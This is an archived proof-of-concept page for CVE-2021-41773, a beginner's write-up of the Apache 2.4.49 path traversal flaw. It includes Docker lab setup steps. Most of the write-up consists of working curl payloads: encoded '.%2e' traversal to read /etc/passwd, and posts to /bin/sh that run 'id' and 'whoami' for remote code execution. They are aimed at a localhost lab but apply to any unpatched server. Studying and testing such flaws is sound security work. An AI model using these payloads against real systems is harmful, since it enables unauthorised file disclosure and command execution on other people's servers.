Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-41773 PoC — Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

Source
https://github.com/noflowpls/CVE-2021-41773
Associated Vulnerability
Title:Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
Description:A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.
Description
CVE-2021-41773
Readme
# CVE-2021-41773

Hello guys, yesterday The new CVE-2021-41773 for apache 2.4.49 verison is released. So in this case, i want to explain about this apache vulnerability.

# Playground
So, I think you guys want to test this vulnerability in website. So i have a playground place for you guys.
This is the website to download docker image of example apache 2.4.49 [Docker Image](https://hub.docker.com/r/blueteamsteve/cve-2021-41773/tags)

Note: there is two Image that `with-cgid` and `no-cgid`. You need to download both images

# Usage
First download the `docker image` in your machine. 

# Pull Docker Images
```
no-cgid: sudo docker pull blueteamsteve/cve-2021-41773:no-cgid
with-cgid: sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
```

# Run Image
```
no-cgid: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
with-cgid: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
```
# Disclaimer
Honestly, I didn't know how he thought to found this vulnerability. So i can't explain fully about this. But I will try my best to talk about all what i understand for this CVE. 

# Vulnerability
This CVE is little interesting because it have two vulnerability. They are `LFD`**Local file disclosure** and `RCE` **Remote Code Execution**. Cool!. So, In this post I will explain about both vulnerability for this CVE. 

# Local-file-disclosure (use **no-cgi** docker image)
So, let start with **Local file disclosure** vulnerability. If you are familiar with apache, you can note that `cgi-bin`(Common Gateway Interface)  is the default path to defines a way for a web server to interact with external content-generating programs in apache-2.4.49

But This is path is `Forbidden` for everyone and even for admin. Hmm, that interesting Right?

And if you familiar with **Local file disclosure** vulnerability, you might know that most of `LFD` vulnerability is happen in forbidden paths. 

So let test LFI simple payloads in the `/cgi-bin/` path.  

I put `../../../../../` before `/etc/paswd`.
(**If you want to know what is `../` check out this blog post[Local file disclosure bypass](https://cobalt.io/blog/a-pentesters-guide-to-file-inclusion)**)



With curl:
```
curl http://localhost:8080/cgi-bin/../../../../../etc/passwd
```
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2003-41-37.png)

With burpsuite:
![burpsuite](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2003-55-53.jpg)

As you can see we got error with this simple payload. In curl we got `404` status code `Not Found` error and in Burp, we got `400 Bad Request` error. 

So that Mean, we should encode our payload to `URL` encoding. So let try it and see what we will get.

So I encode the  `.` to Url.   **Note: `.` is `%2E` and aslo `%2e` in url encoding.**

With curl:
```
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
```
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-14-44.png)

With Burp:
![Burp](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-23-07.png)

Yes!. Our payload worked now. We can read the `/etc/passwd` of website. 

So I hope now you understood about `LFD` Vulnerability of this CVE. So, let continue to the `RCE` Vulnerability of this apache 2.4.49 CVE.

# Remote-Code-Execution (use **with-cgi** docker image)
To explain about the RCE Vulnerability of this CVE, you need to understand about some basics of `RCE` and `linux basics`. 

**Check out this blog post to know [What is RCE](https://www.n-able.com/blog/remote-code-execution)**

Ah, i think you thought that i talk wrongly that i said need `linux basics`. Nope. I didn't say wrong because We actually need it. So let begin!

First let me show the working payload and I will explain how it worked. 
```
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;whoami'
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;id'
```
With Curl:
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-42-23.png)

# Payload-Explain
So Let me explain about this payload.
```
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;id'
```
As you can see the path **`/cgi-bin/`** and encoding **`.%2e`** is same. But There are more two options now. It was `-d` **data** and `/bin/sh` **/bin/bash**.  So, Let me explain why we need to put these.

# /Bin/Bash
First, we want to get remote-code-excution Right?. 

So as you know that in linux based systems `/bin/bash` is the main part to excute and type commands and shells. So We need the `bash` to excute our commands in web server. Check out this[What is Bash in linux](https://opensource.com/resources/what-bash).

# Data
Okay now, let say that we can get `/bin/sh`. We only need to inject our commands. We can put our injection as a data with curl. 

So Our payload is `C|echo;id`. Let me explain what is this.

So `C` is nothing. We can put anything we want before the `|`. like `Comdey|`. 

The `echo;id` is just linux trick.**So, i said that need linux basics**  [Echo basics](https://www.youtube.com/watch?v=tYmFsyH7VJY)

If we put these together we got RCE in apache 2.4.49.

# Thanks!
Thanks For reading guys. This is my first writeup for CVES. Forgive me if i was bad at explaing at this. And also please give me suggestion.

![Gif](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2005-16-30.jpg)
File Snapshot

 [4.0K]  /data/pocs/cc65bebcd975d4e92e9b1c2ccb838dfeccf1d2c5
├── [4.0K]  images
│   ├── [ 50K]  Screenshot from 2021-10-08 03-41-37.png
│   ├── [331K]  Screenshot from 2021-10-08 03-55-53.jpg
│   ├── [126K]  Screenshot from 2021-10-08 04-14-44.png
│   ├── [195K]  Screenshot from 2021-10-08 04-23-07.png
│   ├── [ 52K]  Screenshot from 2021-10-08 04-42-23.png
│   └── [150K]  Screenshot from 2021-10-08 05-16-30.jpg
└── [5.5K]  README.md

1 directory, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →